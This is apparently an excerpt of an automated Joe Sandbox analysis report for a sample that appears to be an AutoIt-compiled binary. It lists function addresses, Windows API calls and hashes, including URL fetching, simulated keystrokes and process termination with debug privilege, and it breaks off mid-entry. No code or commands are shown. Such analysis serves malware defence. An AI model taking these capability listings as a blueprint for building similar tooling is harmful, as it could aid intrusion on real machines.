                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1290815626-3381328864
                                              • Opcode ID: b370b11afb6a5ad274de12a88a3ba9296640a7b82d5f2fbbfea621fb12aed50f
                                              • Instruction ID: bcb4c0717cd63c6520ba98a6b9398c9da67b53e4d8e393d623f8d73d3c154c49
                                              • Opcode Fuzzy Hash: b370b11afb6a5ad274de12a88a3ba9296640a7b82d5f2fbbfea621fb12aed50f
                                              • Instruction Fuzzy Hash: 3011A7B624430EBAFA052A22DC07DE67BDCDF96724F20611AFE00F50D2EB96A8416555
                                              Function 00EFCAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EFCADF
                                              • GetLastError.KERNEL32 ref: 00EFCAF2
                                              • SetEvent.KERNEL32(?), ref: 00EFCB06
                                                • Part of subcall function 00EFCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EFCBCF
                                                • Part of subcall function 00EFCBB0: GetLastError.KERNEL32 ref: 00EFCC7F
                                                • Part of subcall function 00EFCBB0: SetEvent.KERNEL32(?), ref: 00EFCC93
                                                • Part of subcall function 00EFCBB0: InternetCloseHandle.WININET(00000000), ref: 00EFCC9E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 337547030-0
                                              • Opcode ID: 6542a91faa3413e2ba9fe4b3187a9cb4d7fab6c13e6d081fd56ada58aed6279f
                                              • Instruction ID: 80b19fc23f59cde8a2d8dfde31ef11208fbef12dedc3760a2e7dbd02fb0130a1
                                              • Opcode Fuzzy Hash: 6542a91faa3413e2ba9fe4b3187a9cb4d7fab6c13e6d081fd56ada58aed6279f
                                              • Instruction Fuzzy Hash: 0A318079100B0DBFDB219F61CE49AB6BBF9FF44314B24981DFA56A2610D731E810AB60
                                              Function 00EE2E32 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00EE42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE42E6
                                                • Part of subcall function 00EE42CC: GetCurrentThreadId.KERNEL32 ref: 00EE42ED
                                                • Part of subcall function 00EE42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EE2E43), ref: 00EE42F4
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE2E4D
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EE2E6B
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00EE2E6F
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE2E79
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EE2E91
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00EE2E95
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE2E9F
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EE2EB3
                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00EE2EB7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 09e4aaef4d7ab518d6d4511281cc34df540c3d70614f62d54362e400f73eed8e
                                              • Instruction ID: fcf6cc49abfe142fc1cda8f735d6d7251f97fb62bf87f7d20afac2ff5015462d
                                              • Opcode Fuzzy Hash: 09e4aaef4d7ab518d6d4511281cc34df540c3d70614f62d54362e400f73eed8e
                                              • Instruction Fuzzy Hash: 7E01D8713802287BFB106B699C8AF963FA9DB4DB11F115005F318BE1F1C9E11444DA69
                                              Function 00EE2093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00EE1CD9,?,?,00000000), ref: 00EE209C
                                              • HeapAlloc.KERNEL32(00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20A3
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EE1CD9,?,?,00000000), ref: 00EE20B8
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20C0
                                              • DuplicateHandle.KERNEL32(00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20C3
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EE1CD9,?,?,00000000), ref: 00EE20D3
                                              • GetCurrentProcess.KERNEL32(00EE1CD9,00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20DB
                                              • DuplicateHandle.KERNEL32(00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20DE
                                              • CreateThread.KERNEL32(00000000,00000000,00EE2104,00000000,00000000,00000000), ref: 00EE20F8
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 135f5c5213943db40099004496d4e3e90b4d37bb9146540d93521ee981ebf0cc
                                              • Instruction ID: 401e192e818ca94db54979aab70d862ba1ab1d25b0556d6255186b02198f8f45
                                              • Opcode Fuzzy Hash: 135f5c5213943db40099004496d4e3e90b4d37bb9146540d93521ee981ebf0cc
                                              • Instruction Fuzzy Hash: CA01A8B5240348BFE610ABA5DC49FAB7BACEB89711F018411FA05EB1A1CAB498009A20
                                              Function 00F0AA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00EEDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00EEDCC1
                                                • Part of subcall function 00EEDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00EEDCCF
                                                • Part of subcall function 00EEDC9C: CloseHandle.KERNELBASE(00000000), ref: 00EEDD9C
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0AACC
                                              • GetLastError.KERNEL32 ref: 00F0AADF
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0AB12
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F0ABC7
                                              • GetLastError.KERNEL32(00000000), ref: 00F0ABD2
                                              • CloseHandle.KERNEL32(00000000), ref: 00F0AC23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: e544ad2a5949aa236531258fcb166831b26cc4966519ec7f5dec61146aa62b06
                                              • Instruction ID: 8614648509c556500ec64b487df29aea00052cdff394617f5c01a4cf50390a80
                                              • Opcode Fuzzy Hash: e544ad2a5949aa236531258fcb166831b26cc4966519ec7f5dec61146aa62b06
                                              • Instruction Fuzzy Hash: 6861AB71208342AFD320EF14C594F1ABBE1AF54318F19848CE46A9B7E2C775ED45EB92
                                              Function 00F141E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F14284
                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F14299
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F142B3
                                              • _wcslen.LIBCMT ref: 00F142F8
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F14325
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F14353
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcslen
                                              • String ID: SysListView32
                                              • API String ID: 2147712094-78025650
                                              • Opcode ID: 6caf4c23d3df69204838d939d7123a90b87a73e9ad442da48ae8058f59d40f0f
                                              • Instruction ID: b9f51a255fcbfae8fd0454e141e6250426fc25620cd3e602eea2a1fb19649b22
                                              • Opcode Fuzzy Hash: 6caf4c23d3df69204838d939d7123a90b87a73e9ad442da48ae8058f59d40f0f
                                              • Instruction Fuzzy Hash: A641A031A00318ABDB219F64CC45FEA7BB9FF48360F10052AF958E7291D775A9C4EB90
                                              Function 00EEC53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EEC5D9
                                              • IsMenu.USER32(00000000), ref: 00EEC5F9
                                              • CreatePopupMenu.USER32 ref: 00EEC62F
                                              • GetMenuItemCount.USER32(01116050), ref: 00EEC680
                                              • InsertMenuItemW.USER32(01116050,?,00000001,00000030), ref: 00EEC6A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                              • String ID: 0$2
                                              • API String ID: 93392585-3793063076
                                              • Opcode ID: b37ebac25ef18ad8b82e3789dff080a0aab8c1b2dedaee13466b170725361700
                                              • Instruction ID: 7222911fe4fb8ed179c6270007cf97970e37a99a13af20609816ec177c62da56
                                              • Opcode Fuzzy Hash: b37ebac25ef18ad8b82e3789dff080a0aab8c1b2dedaee13466b170725361700
                                              • Instruction Fuzzy Hash: AB51D57060038EABDF10CF6AD984BAFBBF5AF44B18F346519E411B7291D7709942CB22
                                              Function 00EEE653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 642191829-3771769585
                                              • Opcode ID: 918c86c24d47d3e856ffc7b43e6fb7f32cb199c0db28f77b90da4c85e8ac7c38
                                              • Instruction ID: 3d4931ba6777366eaaa372289e0ba1d299b353156c8c068b74579b6ac436e680
                                              • Opcode Fuzzy Hash: 918c86c24d47d3e856ffc7b43e6fb7f32cb199c0db28f77b90da4c85e8ac7c38
                                              • Instruction Fuzzy Hash: 54113371900219ABDB246B319C4AEEE37BCDF45320F111169F545B61D1EFB0DA80EA50
                                              Function 00F04E80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2610073882-625585964
                                              • Opcode ID: 75246de47813d3c059997032af753e92c67a726462ee1cdba4f0a7ccbe1382a8
                                              • Instruction ID: 585ee272ae237e4e8a033c822c411ef6b7497c00f93fe427cdd238c7fb009151
                                              • Opcode Fuzzy Hash: 75246de47813d3c059997032af753e92c67a726462ee1cdba4f0a7ccbe1382a8
                                              • Instruction Fuzzy Hash: 71917371E0061AABDF20CFA4C844FAF7BB8EF45724F108559F515AB280D7B0A945EFA0
                                              Function 00F042A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00F042C8
                                              • CharUpperBuffW.USER32(?,?), ref: 00F043D7
                                              • _wcslen.LIBCMT ref: 00F043E7
                                              • VariantClear.OLEAUT32(?), ref: 00F0457C
                                                • Part of subcall function 00EF15B3: VariantInit.OLEAUT32(00000000), ref: 00EF15F3
                                                • Part of subcall function 00EF15B3: VariantCopy.OLEAUT32(?,?), ref: 00EF15FC
                                                • Part of subcall function 00EF15B3: VariantClear.OLEAUT32(?), ref: 00EF1608
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4137639002-1221869570
                                              • Opcode ID: 1331cbee751afb575d0262c4a3653d4e9fac1373a0a4aa4f6203dd5cd26c5c19
                                              • Instruction ID: e8c4b7125ee300056b49dd2b57ea8f51ca17aad4d0c8f59d45444a7f1c077d7d
                                              • Opcode Fuzzy Hash: 1331cbee751afb575d0262c4a3653d4e9fac1373a0a4aa4f6203dd5cd26c5c19
                                              • Instruction Fuzzy Hash: E4918DB5A043059FC714EF24C98096AB7E5FF88314F14882DF9899B391DB30ED06EB92
                                              Function 00F12A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenu.USER32(?), ref: 00F12AE2
                                              • GetMenuItemCount.USER32(00000000), ref: 00F12B14
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F12B3C
                                              • _wcslen.LIBCMT ref: 00F12B72
                                              • GetMenuItemID.USER32(?,?), ref: 00F12BAC
                                              • GetSubMenu.USER32(?,?), ref: 00F12BBA
                                                • Part of subcall function 00EE42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE42E6
                                                • Part of subcall function 00EE42CC: GetCurrentThreadId.KERNEL32 ref: 00EE42ED
                                                • Part of subcall function 00EE42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EE2E43), ref: 00EE42F4
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F12C42
                                                • Part of subcall function 00EEF1A7: Sleep.KERNEL32 ref: 00EEF21F
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                              • String ID:
                                              • API String ID: 4196846111-0
                                              • Opcode ID: 4897a2a9e7878e50d9a275c7d1408e0a9934bcd284338a032cf3363f0216de56
                                              • Instruction ID: d473aaff33dd89c3385f2c09212811d1db4d91d72ede224bd0954eead110e8e8
                                              • Opcode Fuzzy Hash: 4897a2a9e7878e50d9a275c7d1408e0a9934bcd284338a032cf3363f0216de56
                                              • Instruction Fuzzy Hash: CC71A175E00205AFCB54EFA4C845AEEB7F1EF49320F148458E91AEB351DB34EE819B90
                                              Function 00F187FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00F18896
                                              • IsWindowEnabled.USER32(00000000), ref: 00F188A2
                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F1897D
                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00F189B0
                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00F189E8
                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00F18A0A
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F18A22
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: c94f19877d14bdb3de45957f2ab1b615b9804d4bcf113aedfbe044629fc9674f
                                              • Instruction ID: ec702dd8ff23e096447f44e802e164e4bf421b9f8ca22423ff4a6880ee5f7ef9
                                              • Opcode Fuzzy Hash: c94f19877d14bdb3de45957f2ab1b615b9804d4bcf113aedfbe044629fc9674f
                                              • Instruction Fuzzy Hash: 9571D134A04209AFEF219F51C984FFA7BB5EF0A7A0F54445AE84553261CB31A982EF11
                                              Function 00EE808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE80D1
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE80F7
                                              • SysAllocString.OLEAUT32(00000000), ref: 00EE80FA
                                              • SysAllocString.OLEAUT32 ref: 00EE811B
                                              • SysFreeString.OLEAUT32 ref: 00EE8124
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00EE813E
                                              • SysAllocString.OLEAUT32(?), ref: 00EE814C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 3ab0a1f343a1a53697fe59fa11600c8ea997fb82aa75b3dac9ad486d9f727a37
                                              • Instruction ID: f41626078396ce204e324d2fb42eafbbc6ade34e0753828cc2d85df2a90ca303
                                              • Opcode Fuzzy Hash: 3ab0a1f343a1a53697fe59fa11600c8ea997fb82aa75b3dac9ad486d9f727a37
                                              • Instruction Fuzzy Hash: BC218371201218AFEB10DFA9DD88CEA77ECEB493647018125F909DB2A0DA74EC46DB64
                                              Function 00EF0D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00EF0DAE
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EF0DEA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 5e046f17c261fff785f7f5b93c2f23a2ffa99d9b3c27f64fa2344645a608a42f
                                              • Instruction ID: 40880e81ff75dbab191e1c5332dfbca6749b77b8cca6d53297029f6f5c74ad21
                                              • Opcode Fuzzy Hash: 5e046f17c261fff785f7f5b93c2f23a2ffa99d9b3c27f64fa2344645a608a42f
                                              • Instruction Fuzzy Hash: 7D215C70500309AFDF209F69DC04ABABBB4AF45724F209E19EEA5E72E1D7709940DB50
                                              Function 00EF0E63 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00EF0E82
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EF0EBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 872ea8f9ebcb39f5de1d0c942b39d967282daa37af9b81672f64b97fef293bfa
                                              • Instruction ID: d81b27f58ff1b8b8d8d72246dbfa5eced07f3806cceabae0dabb8bc06d3f9de9
